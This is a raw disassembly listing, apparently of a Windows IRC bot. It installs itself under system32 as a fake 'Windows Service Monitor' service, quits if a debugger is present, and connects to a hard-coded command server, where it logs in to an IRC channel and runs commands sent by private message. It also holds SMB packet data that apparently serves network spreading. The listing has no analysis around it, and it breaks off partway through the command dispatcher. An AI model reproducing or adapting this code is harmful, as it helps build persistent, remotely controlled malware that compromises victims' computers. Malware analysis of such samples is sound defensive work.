dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_6021C0 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_604B25+5C�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_602270 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_604B25+6E�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_602350 dd 3A000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_604B25+AD�o
dd 0AB80000h, 46300800h, 0FF04h, 1000000h, 0F00h, 495C5C5Ch
dd 244350h, 3F3F3F3Fh, 3Fh
dword_602390 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_604B25+BC�o
dd 4DC0800h, 400800h, 0DE00FF18h, 800DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 2 dup(0)
dword_6023F8 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_604B25+CE�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_6024A0 dd 66030000h, 424D53FFh, 25h, 20011800h, 3 dup(0) dd 3900800h, 3C1D0800h, 1C000010h, 0E0040003h, 0FFh, 2 dup(0)
dd 1C004A00h, 2004A03h, 2600h, 5C032340h, 45504950h, 5005Ch
dd 100300h, 31C0000h, 0
dd 3040000h, 0
; ---------------------------------------------------------------------------
pop ds
add [ecx], ah
inc edx
call loc_602691
; ---------------------------------------------------------------------------
align 10h
dd 10000h, 0
dd 1630000h, 0
dd 1630000h, 0
dword_602528 dd 0 dd 0D7h, 1, 0
dd 1, 0
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
align 10h
dword_602550 dd 0CA040000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_604D9C+E�o
dd 1C80800h, 7CC90800h, 80000010h, 0E0040004h, 0FFh, 2 dup(0)
dd 80004A00h, 2004A04h, 2600h, 5C048740h, 45504950h, 5005Ch
dd 100300h, 4800000h, 0
dd 4680000h, 0
dd 72B3001Fh, 1A381h, 0
dd 10000h, 0
dd 2150000h, 0
dd 2150000h, 0
dword_6025D8 dd 0 dd 85h, 2, 0
dd 2, 2EBh, 85h, 2 dup(0)
dword_6025FC dd 205D655Bh, 36312E25h, 2E252073h, 7332hdword_60260C dd 6B32h dd 7078h ; DATA XREF: sub_604AC1+26�o
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_602614 proc near ; DATA XREF: MEW:00601769�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_10], 0
mov [ebp+var_C], offset sub_6028E0
and [ebp+var_8], 0
and [ebp+var_4], 0
call sub_6028A0
mov [ebp+var_10], offset aWinsvcmon ; "winsvcmon"
call sub_602853
lea eax, [ebp+var_10]
push eax
call dword_601000 ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_602651
call sub_6026A5
loc_602651: ; CODE XREF: sub_602614+36�j
call sub_60266C
sub_602614 endp
; ---------------------------------------------------------------------------
call sub_60265F
xor eax, eax
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_60265F proc near ; CODE XREF: MEW:00602656�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], offset loc_601750
leave
retn
sub_60265F endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_60266C proc near ; CODE XREF: sub_602614:loc_602651�p
; sub_6028E0+38�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
call sub_6037CF
call sub_6034D2
lea eax, [ebp+var_190]
push eax
push 101h
call dword_601144 ; WSAStartup
loc_602691: ; CODE XREF: MEW:00602508�p
; sub_60266C+35�j
call sub_602928
push 4000h
call dword_6010E0 ; Sleep
jmp short loc_602691
sub_60266C endp
; ---------------------------------------------------------------------------
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6026A5 proc near ; CODE XREF: sub_602614+38�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 104h
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\winsvcmon.exe"
call dword_6010D0 ; GetSystemDirectoryA
push offset aWinsvcmon_exe ; "winsvcmon.exe"
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\winsvcmon.exe"
push offset dword_601778
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\winsvcmon.exe"
call dword_6010F4 ; wsprintfA
add esp, 10h
push 20h
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\winsvcmon.exe"
call dword_6010D4 ; SetFileAttributesA
and [ebp+var_4], 0
jmp short loc_6026F0
; ---------------------------------------------------------------------------
loc_6026E9: ; CODE XREF: sub_6026A5+74�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_6026F0: ; CODE XREF: sub_6026A5+42�j
cmp [ebp+var_4], 5
jge short loc_60271B
push 0
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\winsvcmon.exe"
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
call dword_6010D8 ; CopyFileA
test eax, eax
jz short loc_60270E
jmp short loc_60271B
; ---------------------------------------------------------------------------
loc_60270E: ; CODE XREF: sub_6026A5+65�j
push 1400h
call dword_6010E0 ; Sleep
jmp short loc_6026E9
; ---------------------------------------------------------------------------
loc_60271B: ; CODE XREF: sub_6026A5+4F�j
; sub_6026A5+67�j
call sub_60272B
test eax, eax
jz short locret_602729
call sub_60383E
locret_602729: ; CODE XREF: sub_6026A5+7D�j
leave
retn
sub_6026A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_60272B proc near ; CODE XREF: sub_6026A5:loc_60271B�p
var_128 = byte ptr -128h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 128h
push 12h
push 0
push 0
call dword_601008 ; OpenSCManagerA
mov [ebp+var_18], eax
push 10h
push offset aWinsvcmon ; "winsvcmon"
push [ebp+var_18]
call dword_601004 ; OpenServiceA
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz loc_6027F5
push 0
push 0
push 0
push 0
push 0
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32\\winsvcmon.exe"
push 0
push 2
push 110h
push 40012h
push offset aWindowsService ; "Windows Service Monitor"
push offset aWinsvcmon ; "winsvcmon"
push [ebp+var_18]
call dword_60103C ; CreateServiceA
mov [ebp+var_20], eax
mov [ebp+var_28], 1
and [ebp+var_24], 0
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_8], 1
lea eax, [ebp+var_28]
mov [ebp+var_4], eax
lea eax, [ebp+var_14]
push eax
push 2
push [ebp+var_20]
call dword_601034 ; ChangeServiceConfig2A
push 100h
push offset aMonitorsAndVer ; "Monitors and verifies integrity of all "...
lea eax, [ebp+var_128]
push eax
call dword_6010CC ; lstrcpynA
lea eax, [ebp+var_128]
mov [ebp+var_1C], eax
lea eax, [ebp+var_1C]
push eax
push 1
push [ebp+var_20]
call dword_601034 ; ChangeServiceConfig2A
loc_6027F5: ; CODE XREF: sub_60272B+2F�j
push 0
push 0
push [ebp+var_20]
call dword_601038 ; StartServiceA
leave
retn
sub_60272B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_602804 proc near ; CODE XREF: sub_6030CA+FB�p
; sub_60492B+12D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push 10000h
push 0
push 0
call dword_601008 ; OpenSCManagerA
mov [ebp+var_4], eax
push 10000h
push offset aWinsvcmon ; "winsvcmon"
push [ebp+var_4]
call dword_601004 ; OpenServiceA
mov [ebp+var_8], eax
push [ebp+var_8]
call dword_601010 ; DeleteService
push [ebp+var_8]
call dword_60100C ; CloseServiceHandle
push [ebp+var_4]
call dword_60100C ; CloseServiceHandle
call sub_60383E
leave
retn
sub_602804 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_602853 proc near ; CODE XREF: sub_602614+25�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 104h
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 0
call dword_6010C8 ; GetModuleFileNameA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr aCM_unpackerPac[eax], 0 ; "C:\\m_unpacker\\packed.exe"
push 44h
push offset dword_601680
call sub_60397F
mov dword_601680, 44h
mov dword_6016AC, 81h
and word_6016B0, 0
leave
retn
sub_602853 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6028A0 proc near ; CODE XREF: sub_602614+19�p
push ebp
mov ebp, esp
push 0
push 0
push 0
push offset sub_6028BA
push 0
push 0
call dword_6010C4 ; CreateThread
pop ebp
retn
sub_6028A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_6028BA proc near ; DATA XREF: sub_6028A0+9�o
push ebp
mov ebp, esp
loc_6028BD: ; CODE XREF: sub_6028BA+20�j
call dword_6010BC ; IsDebuggerPresent
test eax, eax
jz short loc_6028CF
push 0
call dword_6010C0 ; ExitProcess
loc_6028CF: ; CODE XREF: sub_6028BA+B�j
push 80h
call dword_6010E0 ; Sleep
jmp short loc_6028BD
sub_6028BA endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_6028E0 proc near ; DATA XREF: sub_602614+A�o
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebp
mov ebp, esp
sub esp, 20h
push offset sub_602921
push offset aWinsvcmon ; "winsvcmon"
call dword_601018 ; RegisterServiceCtrlHandlerA
mov [ebp+var_20], eax
mov [ebp+var_1C], 10h
mov [ebp+var_18], 4
and [ebp+var_14], 0
lea eax, [ebp+var_1C]
push eax
push [ebp+var_20]
call dword_601014 ; SetServiceStatus
call sub_60266C
sub_6028E0 endp
; ---------------------------------------------------------------------------
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_602921 proc near ; DATA XREF: sub_6028E0+6�o
push ebp
mov ebp, esp
pop ebp
retn 4
sub_602921 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_602928 proc near ; CODE XREF: sub_60266C:loc_602691�p
var_544 = dword ptr -544h
var_540 = dword ptr -540h
var_53C = word ptr -53Ch
var_53A = word ptr -53Ah
var_538 = dword ptr -538h
var_52C = dword ptr -52Ch
var_528 = dword ptr -528h
var_524 = dword ptr -524h
var_520 = byte ptr -520h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 544h
call sub_603ABE
cmp dword_601270, offset aAj74mj33o_v46s ; "aj74mj33o.v46suer0dszx.info"
jnz short loc_602964
mov dword_601270, offset aAj74mj33o_v4_0 ; "aj74mj33o.v46suer0dszx.info"
mov ax, word_6017C4
mov word_6014A8, ax
mov dword_601274, offset aGm2ud36 ; "gm2ud36"
jmp short loc_602984
; ---------------------------------------------------------------------------
loc_602964: ; CODE XREF: sub_602928+18�j
mov dword_601270, offset aAj74mj33o_v46s ; "aj74mj33o.v46suer0dszx.info"
mov ax, word_6017A4
mov word_6014A8, ax
mov dword_601274, offset aGm2ud36_0 ; "gm2ud36"
loc_602984: ; CODE XREF: sub_602928+3A�j
push dword_601270
call dword_601120 ; gethostbyname
mov [ebp+var_11C], eax
cmp [ebp+var_11C], 0
jnz short loc_6029A4
jmp locret_602CF1
; ---------------------------------------------------------------------------
loc_6029A4: ; CODE XREF: sub_602928+75�j
and dword_60126C, 0
mov eax, dword_60126C
mov dword_601268, eax
mov eax, [ebp+var_11C]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_538], eax
mov [ebp+var_53C], 2
mov ax, word_6014A8
mov [ebp+var_53A], ax
push 6
push 1
push 2
call dword_601124 ; socket
mov dword_601540, eax
mov [ebp+var_10], 1
push 4
lea eax, [ebp+var_10]
push eax
push 8
push 0FFFFh
push dword_601540
call dword_601128 ; setsockopt
push 10h
lea eax, [ebp+var_53C]
push eax
push dword_601540
call dword_60112C ; connect
push dword_601274
push offset aPass_32s ; "PaSS %.32s\n"
push offset dword_601278
call dword_6010F4 ; wsprintfA
add esp, 0Ch
mov dword_6014AC, eax
push 0
push dword_6014AC
push offset dword_601278
push dword_601540
call dword_601130 ; send
push 0
push 0Dh
push offset aUserLLLL ; "USeR l l l l\n"
push dword_601540
call dword_601130 ; send
call sub_6034AE
push 20h
push offset dword_601478
push offset dword_601488
call dword_6010CC ; lstrcpynA
push offset dword_601488
push offset aNick_24s ; "NiCK %.24s\n"
push offset dword_601278
call dword_6010F4 ; wsprintfA
add esp, 0Ch
mov dword_6014AC, eax
push 0
push dword_6014AC
push offset dword_601278
push dword_601540
call dword_601130 ; send
mov [ebp+var_4], 10h
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_53C]
push eax
push dword_601540
call dword_601134 ; getsockname
mov eax, [ebp+var_538]
mov dword_601538, eax
and [ebp+var_4], 0
and [ebp+var_118], 0
loc_602AF1: ; CODE XREF: sub_602928+23F�j
and [ebp+var_540], 0
jmp short loc_602B07
; ---------------------------------------------------------------------------
loc_602AFA: ; CODE XREF: sub_602928:loc_602B2C�j
mov eax, [ebp+var_540]
inc eax
mov [ebp+var_540], eax
loc_602B07: ; CODE XREF: sub_602928+1D0�j
mov eax, [ebp+var_540]
cmp eax, [ebp+var_118]
jnb short loc_602B2E
mov eax, [ebp+var_540]
mov eax, [ebp+eax*4+var_114]
cmp eax, dword_601540
jnz short loc_602B2C
jmp short loc_602B2E
; ---------------------------------------------------------------------------
loc_602B2C: ; CODE XREF: sub_602928+200�j
jmp short loc_602AFA
; ---------------------------------------------------------------------------
loc_602B2E: ; CODE XREF: sub_602928+1EB�j
; sub_602928+202�j
mov eax, [ebp+var_540]
cmp eax, [ebp+var_118]
jnz short loc_602B65
cmp [ebp+var_118], 40h
jnb short loc_602B65
mov eax, [ebp+var_540]
mov ecx, dword_601540
mov [ebp+eax*4+var_114], ecx
mov eax, [ebp+var_118]
inc eax
mov [ebp+var_118], eax
loc_602B65: ; CODE XREF: sub_602928+212�j
; sub_602928+21B�j
xor eax, eax
jnz short loc_602AF1
mov eax, dword_6017E8
mov [ebp+var_528], eax
and [ebp+var_524], 0
loc_602B7B: ; CODE XREF: sub_602928+3B8�j
lea eax, [ebp+var_528]
push eax
push 0
push 0
lea eax, [ebp+var_118]
push eax
push 0
call dword_601138 ; select
cmp eax, 1
jnz loc_602CE5
push 0
mov eax, 400h
sub eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_520]
push eax
push dword_601540
call dword_60113C ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jg short loc_602BCE
jmp loc_602CE5
; ---------------------------------------------------------------------------
loc_602BCE: ; CODE XREF: sub_602928+29F�j
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+eax+var_520], 0
lea eax, [ebp+var_520]
mov [ebp+var_52C], eax
loc_602BEE: ; CODE XREF: sub_602928:loc_602C5B�j
mov eax, [ebp+var_52C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_602C5D
push 0Dh
push [ebp+var_52C]
call sub_603A00
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_602C2F
mov eax, [ebp+var_C]
mov byte ptr [eax], 0
push [ebp+var_52C]
call sub_602D3E
mov eax, [ebp+var_C]
inc eax
inc eax
mov [ebp+var_52C], eax
jmp short loc_602C5B
; ---------------------------------------------------------------------------
loc_602C2F: ; CODE XREF: sub_602928+2E7�j
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_520]
sub eax, [ebp+var_52C]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
inc eax
push eax
push [ebp+var_52C]
lea eax, [ebp+var_520]
push eax
call sub_6039D1
jmp short loc_602C61
; ---------------------------------------------------------------------------
loc_602C5B: ; CODE XREF: sub_602928+305�j
jmp short loc_602BEE
; ---------------------------------------------------------------------------
loc_602C5D: ; CODE XREF: sub_602928+2D1�j
and [ebp+var_4], 0
loc_602C61: ; CODE XREF: sub_602928+331�j
and [ebp+var_118], 0
loc_602C68: ; CODE XREF: sub_602928+3B6�j
and [ebp+var_544], 0
jmp short loc_602C7E
; ---------------------------------------------------------------------------
loc_602C71: ; CODE XREF: sub_602928:loc_602CA3�j
mov eax, [ebp+var_544]
inc eax
mov [ebp+var_544], eax
loc_602C7E: ; CODE XREF: sub_602928+347�j
mov eax, [ebp+var_544]
cmp eax, [ebp+var_118]
jnb short loc_602CA5
mov eax, [ebp+var_544]
mov eax, [ebp+eax*4+var_114]
cmp eax, dword_601540
jnz short loc_602CA3
jmp short loc_602CA5
; ---------------------------------------------------------------------------
loc_602CA3: ; CODE XREF: sub_602928+377�j
jmp short loc_602C71
; ---------------------------------------------------------------------------
loc_602CA5: ; CODE XREF: sub_602928+362�j
; sub_602928+379�j
mov eax, [ebp+var_544]
cmp eax, [ebp+var_118]
jnz short loc_602CDC
cmp [ebp+var_118], 40h
jnb short loc_602CDC
mov eax, [ebp+var_544]
mov ecx, dword_601540
mov [ebp+eax*4+var_114], ecx
mov eax, [ebp+var_118]
inc eax
mov [ebp+var_118], eax
loc_602CDC: ; CODE XREF: sub_602928+389�j
; sub_602928+392�j
xor eax, eax
jnz short loc_602C68
jmp loc_602B7B
; ---------------------------------------------------------------------------
loc_602CE5: ; CODE XREF: sub_602928+270�j
; sub_602928+2A1�j
push dword_601540
call dword_601140 ; closesocket
locret_602CF1: ; CODE XREF: sub_602928+77�j
leave
retn
sub_602928 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_602CF3 proc near ; CODE XREF: sub_6030CA+2DD�p
; sub_6030CA+321�p ...
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
push [ebp+arg_0]
push offset dword_6017C8
push offset aPrivmsg_16s_48 ; "PRiVMSG %.16s :%.480s\n"
lea eax, [ebp+var_200]
push eax
call dword_6010F4 ; wsprintfA
add esp, 10h
mov [ebp+var_204], eax
push 0
push [ebp+var_204]
lea eax, [ebp+var_200]
push eax
push dword_601540
call dword_601130 ; send
leave
retn 4
sub_602CF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_602D3E proc near ; CODE XREF: sub_602928+2F5�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_602D7D
mov eax, [ebp+arg_0]
inc eax
mov [ebp+var_4], eax
push 20h
push [ebp+var_4]
call sub_603A00
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_602D6E
jmp locret_6030C6
; ---------------------------------------------------------------------------
loc_602D6E: ; CODE XREF: sub_602D3E+29�j
mov eax, [ebp+var_C]
mov byte ptr [eax], 0
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_602D87
; ---------------------------------------------------------------------------
loc_602D7D: ; CODE XREF: sub_602D3E+F�j
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
loc_602D87: ; CODE XREF: sub_602D3E+3D�j
push 20h
push [ebp+var_C]
call sub_603A00
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_602DA1
jmp locret_6030C6
; ---------------------------------------------------------------------------
jmp short loc_602DAE
; ---------------------------------------------------------------------------
loc_602DA1: ; CODE XREF: sub_602D3E+5A�j
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_602DAE: ; CODE XREF: sub_602D3E+61�j
push offset aPing ; "PING"
push [ebp+var_C]
call dword_6010B8 ; lstrcmpA
test eax, eax
jnz short loc_602DF9
push [ebp+var_8]
push offset aPong_500s ; "PoNG %.500s\r\n"
push offset dword_601278
call dword_6010F4 ; wsprintfA
add esp, 0Ch
mov dword_6014AC, eax
push 0
push dword_6014AC
push offset dword_601278
push dword_601540
call dword_601130 ; send
jmp locret_6030C6
; ---------------------------------------------------------------------------
loc_602DF9: ; CODE XREF: sub_602D3E+80�j
push offset aPrivmsg ; "PRIVMSG"
push [ebp+var_C]
call dword_6010B8 ; lstrcmpA
test eax, eax
jnz loc_602EA5
and [ebp+var_10], 0
cmp [ebp+var_4], 0
jz short loc_602E32
push [ebp+var_4]
push offset dword_6017F0
call sub_603F01
cmp eax, 1
jnz short loc_602E32
mov [ebp+var_10], 1
loc_602E32: ; CODE XREF: sub_602D3E+D9�j
; sub_602D3E+EB�j
push 20h
push [ebp+var_8]
call sub_603A00
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_602EA0
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_602E5E
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_602E5E: ; CODE XREF: sub_602D3E+117�j
cmp [ebp+var_10], 1
jnz short loc_602EA0
mov eax, [ebp+var_14]
movsx eax, byte ptr [eax]
movsx ecx, byte_6017A6
cmp eax, ecx
jnz short loc_602E83
push 0
mov eax, [ebp+var_14]
inc eax
push eax
call sub_6030CA
jmp short loc_602EA0
; ---------------------------------------------------------------------------
loc_602E83: ; CODE XREF: sub_602D3E+135�j
mov eax, [ebp+var_14]
movsx eax, byte ptr [eax]
movsx ecx, byte_6017A7
cmp eax, ecx
jnz short loc_602EA0
push 1
mov eax, [ebp+var_14]
inc eax
push eax
call sub_6030CA
loc_602EA0: ; CODE XREF: sub_602D3E+105�j
; sub_602D3E+124�j ...
jmp locret_6030C6
; ---------------------------------------------------------------------------
loc_602EA5: ; CODE XREF: sub_602D3E+CB�j
push offset a433 ; "433"
push [ebp+var_C]
call dword_6010B8 ; lstrcmpA
test eax, eax
jnz short loc_602F12
cmp dword_60126C, 0
jnz short loc_602F0D
call sub_6034AE
push 20h
push offset dword_601478
push offset dword_601488
call dword_6010CC ; lstrcpynA
push offset dword_601488
push offset aNick_24s ; "NiCK %.24s\n"
push offset dword_601278
call dword_6010F4 ; wsprintfA
add esp, 0Ch
mov dword_6014AC, eax
push 0
push dword_6014AC
push offset dword_601278
push dword_601540
call dword_601130 ; send
loc_602F0D: ; CODE XREF: sub_602D3E+180�j
jmp locret_6030C6
; ---------------------------------------------------------------------------
loc_602F12: ; CODE XREF: sub_602D3E+177�j
push offset a332 ; "332"
push [ebp+var_C]
call dword_6010B8 ; lstrcmpA
test eax, eax
jnz short loc_602F7E
push 20h
push [ebp+var_8]
call sub_603A00
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_602F40
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
jmp short loc_602F45
; ---------------------------------------------------------------------------
loc_602F40: ; CODE XREF: sub_602D3E+1F7�j
jmp locret_6030C6
; ---------------------------------------------------------------------------
loc_602F45: ; CODE XREF: sub_602D3E+200�j
push 20h
push [ebp+var_18]
call sub_603A00
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_602F79
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_602F71
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_602F71: ; CODE XREF: sub_602D3E+22A�j
push [ebp+var_18]
call sub_603437
loc_602F79: ; CODE XREF: sub_602D3E+218�j
jmp locret_6030C6
; ---------------------------------------------------------------------------
loc_602F7E: ; CODE XREF: sub_602D3E+1E4�j
push offset a302 ; "302"
push [ebp+var_C]
call dword_6010B8 ; lstrcmpA
test eax, eax
jnz loc_60302C
cmp dword_601268, 0
jnz loc_60302C
push 40h
push [ebp+var_8]
call sub_603A00
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_603022
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
push 20h
push [ebp+var_1C]
call sub_603A00
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_602FD4
mov eax, [ebp+var_20]
mov byte ptr [eax], 0
loc_602FD4: ; CODE XREF: sub_602D3E+28E�j
push [ebp+var_1C]
call dword_60114C ; inet_addr
mov dword_60153C, eax
cmp dword_60153C, 0FFFFFFFFh
jnz short loc_603018
push [ebp+var_1C]
call dword_601120 ; gethostbyname
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_603016
mov eax, [ebp+var_24]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov dword_60153C, eax
mov dword_601268, 1
loc_603016: ; CODE XREF: sub_602D3E+2BD�j
jmp short loc_603022
; ---------------------------------------------------------------------------
loc_603018: ; CODE XREF: sub_602D3E+2AB�j
mov dword_601268, 1
loc_603022: ; CODE XREF: sub_602D3E+274�j
; sub_602D3E:loc_603016�j
call sub_603AF7
jmp locret_6030C6
; ---------------------------------------------------------------------------
loc_60302C: ; CODE XREF: sub_602D3E+250�j
; sub_602D3E+25D�j
push offset a001 ; "001"
push [ebp+var_C]
call dword_6010B8 ; lstrcmpA
test eax, eax
jnz locret_6030C6
cmp dword_60126C, 0
jnz short locret_6030C6
mov dword_60126C, 1
push offset dword_601488
push offset aUserhost_16s ; "USeRHOST %.16s\n"
push offset dword_601278
call dword_6010F4 ; wsprintfA
add esp, 0Ch
mov dword_6014AC, eax
push 0
push dword_6014AC
push offset dword_601278
push dword_601540
call dword_601130 ; send
push offset a9yc8b2ni ; "9yc8b2ni"
push offset dword_6017C8
push offset aJoin_16s_16s ; "JOiN %.16s %.16s\n"
push offset dword_601278
call dword_6010F4 ; wsprintfA
add esp, 10h
mov dword_6014AC, eax
push 0
push dword_6014AC
push offset dword_601278
push dword_601540
call dword_601130 ; send
locret_6030C6: ; CODE XREF: sub_602D3E+2B�j
; sub_602D3E+5C�j ...
leave
retn 4
sub_602D3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_6030CA proc near ; CODE XREF: sub_602D3E+13E�p
; sub_602D3E+15D�p ...
var_420 = dword ptr -420h
var_41C = byte ptr -41Ch
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
mov [ebp+var_420], eax
cmp [ebp+var_420], 66h
jg short loc_603151
cmp [ebp+var_420], 66h
jz loc_603333
cmp [ebp+var_420], 44h
jz loc_6033FC
cmp [ebp+var_420], 45h
jz loc_6033B1
cmp [ebp+var_420], 46h
jz loc_603355
cmp [ebp+var_420], 4Ch
jz loc_603321
cmp [ebp+var_420], 51h
jz loc_6031CF
cmp [ebp+var_420], 52h
jz short loc_6031A4
cmp [ebp+var_420], 65h
jz loc_6032E1
jmp locret_603433
; ---------------------------------------------------------------------------
loc_603151: ; CODE XREF: sub_6030CA+1C�j
cmp [ebp+var_420], 68h
jz loc_603403
cmp [ebp+var_420], 69h
jz loc_603299
cmp [ebp+var_420], 6Ch
jz loc_60330F
cmp [ebp+var_420], 6Eh
jz loc_60335F
